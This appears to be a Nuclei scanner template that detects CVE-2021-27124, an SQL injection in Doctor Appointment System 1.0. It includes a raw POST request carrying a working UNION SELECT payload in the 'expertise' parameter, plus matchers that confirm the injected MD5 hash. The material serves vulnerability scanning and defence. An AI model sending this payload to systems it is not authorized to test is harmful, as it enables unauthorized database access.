58 lines
2.1 KiB
YAML
58 lines
2.1 KiB
YAML
id: CVE-2021-27124
|
|
|
|
info:
|
|
name: Doctor Appointment System 1.0 - SQL Injection
|
|
author: theamanrawat
|
|
severity: medium
|
|
description: |
|
|
SQL injection in the expertise parameter in search_result.php in Doctor Appointment System v1.0.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
|
|
remediation: |
|
|
Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
|
|
- https://packetstormsecurity.com/files/161342/Doctor-Appointment-System-1.0-SQL-Injection.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-27124
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 6.5
|
|
cve-id: CVE-2021-27124
|
|
cwe-id: CWE-89
|
|
epss-score: 0.01251
|
|
epss-percentile: 0.85241
|
|
cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 1
|
|
vendor: doctor_appointment_system_project
|
|
product: doctor_appointment_system
|
|
tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /patient/search_result.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
expertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit=
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "c8c605999f3d8352d7bb792cf3fdb25b"
|
|
- "Doctor Appoinment System"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100a402101096ce7def9e01253aed74d686ca491e1c4b6fad1a0591a5662520cb8e02203e62bb17eb3da7850635c125c56f5cb8f51ba1520a03e9a3c04ff2998a38a8b1:922c64590222798bb761d5b6d8e72950 |